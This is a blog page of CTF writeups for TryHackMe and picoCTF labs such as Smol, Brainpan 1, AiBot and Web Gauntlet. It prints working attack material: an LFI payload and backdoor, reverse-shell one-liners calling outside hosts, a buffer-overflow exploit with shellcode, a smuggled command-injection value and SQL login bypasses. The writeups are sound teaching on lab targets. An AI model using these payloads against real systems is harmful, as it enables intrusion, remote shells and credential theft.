Enterprise

Enterprise Challenges Difficulty: Hard Category: Active Directory Initial Access First things go first and the first here is to scan the ip from the scan result we are dealing with a domain controller and the domain name is Enterprise.THM we shall run a script scan hopefully we might found any known vulnerability but no there isn’t 😑 So now we want to find any credentials to gain our initial access to this DC as this DC are running a web server on port 80 it’s a good idea to discover it noting important in this page but it might have another pages another dead end no problem let’s continue another interesting service are running in this DC which is smb can we access any share in it🤔 yes there is more than one share we can access as guest one of them is users share with a remark Users share. Do not Touch we are able to connect to it using smbclint but to go faster we will use smbmap To narrow our search smbmap -H 10.10.226.245 -u 'a' -p '' -r 'Users' even smbap showed that we have read permission i got many NT_STATUS_ACCESS_DENIED listing so i moved to another path. if you searched with the domain name in github you will find an organization in the people section there is a user called Nik-enterprise-dev which has only one repo that contains a script called mgmtScript.ps1 in the commit history of this ps script there is a user and password we can connect with it to make sure that it’s still working and it is in the home directory of this user there is 2 files but they was password protected we can try to use this user to get user spns using impacket and we got a hash from this using hashcat we were able to crack it and get bitbucket creds using rdb we got into his desktop and found the first flag Privilege Escalation so we don’t have much to do with tis user one of the ways to escalate window privilege is Unquoted Service Path which is one of the easiest ways in my mind wmic service get name,pathname bingo we found an interesting one here so let’s create our revers shell using msfvenom after moving our shell to the program file we need to start this service Grate news we escalated our privilege 🎉 and here is your flag😉

CTF Writeups · 2025-04-18

Smol

Smol Challenges Difficulty: Medium Category: Privilege Escalation Initial Access Get a cup of coffee ☕ first this will be a little bit long walkthrough 😊 From the end of the page on http://www.smol.thm or from wappalyzer this website is using WordPress so start to scan it with wpscan wpscan --url [http://www.smol.thm](http://www.smol.thm/) from the scan result there is a plugin called jsmol2wp where did i here this name before🤔 Yes this plugin is vulnerable to SSRF wpscan let’s try this payload on our smol.thm http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php in the wp-config.php file we found a credentials for a user called wpuser /** Database username */ define( 'DB_USER', 'wpuser' ); /** Database password */ define( 'DB_PASSWORD', 'kbLSF2Vop#lw3rjDZ629*Z%G' ); from the comment section we can get to a login page and the creds are working in this file note the first important line that refaces to Hello Dolly plugin just for fun 😂 back to our work we should review hello.php file http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php in this code we can see a part of the code that uses eval which is a vulnerable function but the reset of the line is base64 encoded from the decoding result the statement is if (isset($_GET["cmd"])) { system($_GET["cmd"]); } adding the cmd parameter we can execute system commands now we want to get a shell from this busybox nc 10.11.130.37 4444 -e sh and we got our initial access 🎉 Privilege Escalation python3 -c 'import pty; pty.spawn("/bin/bash")' As we know that there is a database running let’s try to get another user creds from it Cracking this hashes with john we got a password that is obviously for the user diego what i had checked: ❌ sudo -l ❌ /cat /etc/crontab ❌ suid ❌ capabilities in the home of the user think you can find an ssh key that you can use to connect in gege home there is a .zip file that you can access as other but this file is password protected you can use john to crack this file inside this compressed file there is a wp-config.php file that has the credential of xavi maybe it’s our lucky user finally we escalated our privilege 😮‍💨 Great to see you at the end of this rich challenge😊. keep it up 💪

CTF Writeups · 2025-04-16

LazyAdmin

LazyAdmin Challenges Difficulty: Easy Category: Privilege Escalation Initial Access As usual we will start with with nmap to scan the machine There is 2 open ports 22, 80 so let’s open this webpage ok it’s an apache server but we want to fuzz this ip to find more interesting pages great there is a directory called content going deeper in this directory we found several interesting pages the /as one is a login page but we don’t have credentials yet ;) now this is an interesting one as we can find a working creds from this backup and we got a user called manager with admin role and a hash for his password and we got the password browsing this site we can find a Media Center tab with a file upload just upload a reverse shell and you will get a shell but remember to change the .php to .php5 or any other extension Privilege Escalation Great we got initial access with a www-data now we need to escalate to root checking our permissions we saw that there is a file that we can run as sudo and we also has write permission to this file so overwrite it with another shell and run as sudo and you will get a root shell

CTF Writeups · 2025-04-16

Brainpan 1

Brainpan 1 Challenges Difficulty: Hard Category: Revers Walkthrough Stating with nmap to scan the machine we found a service called abyss on port 9999 a web server running on port 10000 Opening it returns a page that has nothing interested let’s use dirb to discover directories opening /bin we found an .exe file called Brainpan.exe lets try to download it let’s reverse this file using Ghidra so this is the one running on port 9999 and this program takes one input from the user and returns ACCESS DENIED or ACCESS GRANTED Friendly advice don’t waste yore time to get the correct password as its actually just a printed string but as i have wasted my time :) so if you sent the string shitstorm that will return ACCESS GRANTED actually this is the vulnerable part of the code as strcpy does not check bounds. so If input is longer than 520 bytes, it will overflow local_20c now we want to run this exe inside a debugger to cause a BO and get the address that would be in the eip to start our exploit i will use Immunity Debugger to do so created a pattern using msf-pattern_create to find the exact offset After a looooooooooong time i realized that ncat has a max buffer size of 511 🙂 let’s use python import socket # Target details TARGET_IP = "127.0.0.1" TARGET_PORT = 9999 # Payload (1000 'A' characters) payload = "A" * 1000 # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: # Connect to the target s.connect((TARGET_IP, TARGET_PORT)) print("[+] Connected to the target") # Receive banner (if any) response = s.recv(1024) print("[+] Received:", response.decode(errors="ignore")) # Send the payload s.sendall(payload.encode()) print("[+] Sent 1000 bytes") # Receive response (if any) response = s.recv(1024) print("[+] Server response:", response.decode(errors="ignore")) except Exception as e: print("[!] Connection failed:", str(e)) finally: s.close() print("[+] Connection closed") and finaly it’s a crash As we successful caused a BO we will use mona script inside Immunity Debugger to find a jmp esp instruction address created a reverse shell using msfvenom to connect to my local ip throw port 4444 and modified the script import socket import struct # Target details TARGET_IP = "127.0.0.1" TARGET_PORT = 9999 # Payload (1000 'A' characters) offset = b"A"*524 eip= b'\xf3\x12\x17\x31' #311712F3 buf = b"" buf += b"\xd9\xc1\xba\x43\xbc\xeb\x48\xd9\x74\x24\xf4\x5d" buf += b"\x31\xc9\xb1\x52\x31\x55\x17\x03\x55\x17\x83\x86" buf += b"\xb8\x09\xbd\xf4\x29\x4f\x3e\x04\xaa\x30\xb6\xe1" buf += b"\x9b\x70\xac\x62\x8b\x40\xa6\x26\x20\x2a\xea\xd2" buf += b"\xb3\x5e\x23\xd5\x74\xd4\x15\xd8\x85\x45\x65\x7b" buf += b"\x06\x94\xba\x5b\x37\x57\xcf\x9a\x70\x8a\x22\xce" buf += b"\x29\xc0\x91\xfe\x5e\x9c\x29\x75\x2c\x30\x2a\x6a" buf += b"\xe5\x33\x1b\x3d\x7d\x6a\xbb\xbc\x52\x06\xf2\xa6" buf += b"\xb7\x23\x4c\x5d\x03\xdf\x4f\xb7\x5d\x20\xe3\xf6" buf += b"\x51\xd3\xfd\x3f\x55\x0c\x88\x49\xa5\xb1\x8b\x8e" buf += b"\xd7\x6d\x19\x14\x7f\xe5\xb9\xf0\x81\x2a\x5f\x73" buf += b"\x8d\x87\x2b\xdb\x92\x16\xff\x50\xae\x93\xfe\xb6" buf += b"\x26\xe7\x24\x12\x62\xb3\x45\x03\xce\x12\x79\x53" buf += b"\xb1\xcb\xdf\x18\x5c\x1f\x52\x43\x09\xec\x5f\x7b" buf += b"\xc9\x7a\xd7\x08\xfb\x25\x43\x86\xb7\xae\x4d\x51" buf += b"\xb7\x84\x2a\xcd\x46\x27\x4b\xc4\x8c\x73\x1b\x7e" buf += b"\x24\xfc\xf0\x7e\xc9\x29\x56\x2e\x65\x82\x17\x9e" buf += b"\xc5\x72\xf0\xf4\xc9\xad\xe0\xf7\x03\xc6\x8b\x02" buf += b"\xc4\x96\x4b\x0c\x15\x01\x4e\x0c\x04\x8d\xc7\xea" buf += b"\x4c\x3d\x8e\xa5\xf8\xa4\x8b\x3d\x98\x29\x06\x38" buf += b"\x9a\xa2\xa5\xbd\x55\x43\xc3\xad\x02\xa3\x9e\x8f" buf += b"\x85\xbc\x34\xa7\x4a\x2e\xd3\x37\x04\x53\x4c\x60" buf += b"\x41\xa5\x85\xe4\x7f\x9c\x3f\x1a\x82\x78\x07\x9e" buf += b"\x59\xb9\x86\x1f\x2f\x85\xac\x0f\xe9\x06\xe9\x7b" buf += b"\xa5\x50\xa7\xd5\x03\x0b\x09\x8f\xdd\xe0\xc3\x47" buf += b"\x9b\xca\xd3\x11\xa4\x06\xa2\xfd\x15\xff\xf3\x02" buf += b"\x99\x97\xf3\x7b\xc7\x07\xfb\x56\x43\x27\x1e\x72" buf += b"\xbe\xc0\x87\x17\x03\x8d\x37\xc2\x40\xa8\xbb\xe6" buf += b"\x38\x4f\xa3\x83\x3d\x0b\x63\x78\x4c\x04\x06\x7e" buf += b"\xe3\x25\x03" nop=b'\x90'*50 eof=b"\xCC" payload= offset+eip+nop+buf+nop+eof # Create a TCP socket s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Connect to the target s.connect((TARGET_IP, TARGET_PORT)) print("[+] Connected to the target") # Receive banner (if any) response = s.recv(1024) # Send the payload s.sendall(payload) print("[+] Sent 1000 bytes") and this worked correctly and got a reverse shell now we want to send it to the actual server remember to recreate the reverse shell with your ip and we got a shell but it seems that we are inside Sandbox/Evasion Environment now we know that we can run /home/anansi/bin/anansi_util with sudo this bin gives us 3 commands that we can run network proclist manual from gtfobins we know that we can get a shell from man using !/bin/sh

CTF Writeups · 2025-04-15

AiBot

AiBot Challenges Difficulty: Medium Category: Machines WALKTHROUGH This challenge is from Cybertalant 2025 ramadan nights CTF First thing we got is a terminal with a user called ttyduser to list this user permissions use sudo -l ttyduser can run /usr/bin/python3 /opt/aiwget.py with sudo import argparse import re from paddle import utils def is_valid_url(url): regex = re.compile( r'^(?:http|ftp|https)s?://', re.IGNORECASE, ) return re.match(regex, url) is not None def is_valid_path(path): return path.startswith("/tmp") def main(): parser = argparse.ArgumentParser(description='Download AI Model.') parser.add_argument('url', type=str, help='URL to download from') parser.add_argument('path', type=str, help='Path to save the file, must start with /tmp') args parser.parse_args() if not is_valid_url(args.url): raise ValueError("The URL is not valid.") if not is_valid_path(args.path): raise ValueError("The path must start with /tmp.") utils.download._wget_download(args.url, args.path) if __name__ == '__main__': main() This script requires two arguments: url: the link to the AI Model to download path: path to save model to and must start with /tmp Takes the arguments directly from the user and passes them to _wget_download function we found a cve for utils.download._wget_download function So we tried to do so sudo /usr/bin/python3 /opt/aiwget.py "https://; sleep 10" /tmp/model and it works so lets try to get a revere shell using ngrok ngrok tcp 4444 sudo /usr/bin/python3 /opt/aiwget.py "https://; bash -c 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/14455 0>&1'" /tmp/model

CTF Writeups · 2025-04-15

Web Gauntlet

Web Gauntlet Challenges Difficulty: Medium Category: Web Exploitation Introduction This series focuses on the fundamentals of SQL Injection vulnerability. Check out A03:2021-Injection. WALKTHROUGH This challenge is from the picoCTF 2020 Mini-Competition. Hints: You are not allowed to log in with valid credentials. Write down the injections you use in case you lose your progress. For some filters, it may be hard to see the characters. Always (always) look at the raw hex in the response. SQLite is used. If your cookie keeps getting reset, try using a private browser window. The challenge gives us two links as shown above. The first one is a login page, and the second shows us what the round filters. \ Round 1 For the first round, it filters out or, so we can still use – to comment out the rest of the query. Username: admin'-- Password: anything, e.g., 123 Then the query should look like this: SELECT * FROM users WHERE username='admin'-- AND password='123' Round 2 Now we are in round 2, and it filters out the following: or, like, =, and –. We shall try to use an alternative method, like union, to continue. Username: admin'union select * from users where '1; Password: anything, e.g., 123 Then the query should look like this: SELECT * FROM users WHERE username='admin'; AND password='123' Round 3 In round 3, it filters or, =, like, >, <, and –. We can use ; to end the query. In SQL, the semicolon is a statement terminator, meaning it marks the end of a SQL statement. It tells the database engine that the statement is complete and ready to be executed Username: admin'; Password: anything, e.g., 123 Then the query should look like this: SELECT * FROM users WHERE username='admin'; AND password='123' Round 4 Round 4 is a little more creative as it filters out or, =, like, >, <, –, and admin. Admin?? 🙂 Don’t panic, no problem! 😅 In SQL, the || operator is commonly used for string concatenation, especially in databases like SQLite. If the application’s underlying SQL query uses this operator correctly, entering ad'||'min' would result in the following behavior: SELECT * FROM users WHERE username='admin'; And this is what we want. Username: ad'||'min'; Password: anything, e.g., 123 Then the query should look like this: SELECT * FROM users WHERE username='admin'; AND password='123' Round 5 We are in the final round—good job! ✌ In the final round, it filters and, =, like, >, <, –, union, and admin, but we will use the same method as in the previous round. Username: ad'||'min'; Password: anything, e.g., 123 Then the query should look like this: SELECT * FROM users WHERE username='admin'; AND password='123' Congrats! You won! Check out filter.php. Many thanks to onealmond as his write-up helped me a lot in solving this challenge.

CTF Writeups · 2024-10-16

Irish-Name-Repo

Irish-Name-Repo series [1,2,3] Challenges Difficulty: Medium Category: Web Exploitation Introduction This series focus on the fundamentals of SQL Injection vulnerability A03:2021-Injectionicon WALKTHROUGH This challenges is from PicoCTF 2019 Irish-Name-Repo 1 Hints: There doesn’t seem to be many ways to interact with this. I wonder if the users are kept in a database? Try to think about how the website verifies your login. After opening the link we go into a website that have images of Irish people We notice that in the top left we have a hamburger menu clicking it gives us three pages including Admin Login interesting right!🤔 Basically SQL injection infected form has no input validation so the website verifies your login by using the input directly in the query like this SELECT * FROM users WHERE username = '$username' AND password = '$password'; as an example if we entered ahmed as a user and 123 as a password it will be like this SELECT * FROM users WHERE username = 'ahmed' AND password = '123'; So we need to make this statement always true and a simple way is just entering ‘or’1’=’1 as a password and this will make the statment always true SELECT * FROM users WHERE username = 'ahmed' AND password = ' ' or '1'='1'; and yes we are in 🤗 Irish-Name-Repo 2 Hints: The password is being filtered. the website is typically the same as the first one but if we tried the same way we get based on the hint we have, we know that The password is being filtered so we try to enter the username as admin’– to comment the rest of the query SELECT * FROM users WHERE username = 'admin'-- AND password = '123'; and that’s it Irish-Name-Repo 3 Hints: Seems like the password is encrypted. know we have something different as the login page just have password without username Trying to enter any thing gives us login failed lets try to use Burp to see what is happening in the request we notice that the password is sent with a debug=0 Let’s change it to 1 based on the hint the password is encrypted and it seems to be ROT13 using CyberChef to decrypt it and yes it is so we just need to use our old method ‘or’1’=’1 but ROT13 it first by sending it using burp we get the flag This was a simple and easy way to solve this series of challenges please leave a comment if you have any question by the way this is my first write-up ever if you have any suggestion please let me know🤗 shout out📢 to my friend Omar Ashraf who encouraged me to start writing and supported me very much

CTF Writeups · 2024-10-15

AhmedZaid

Contact

CTF Writeups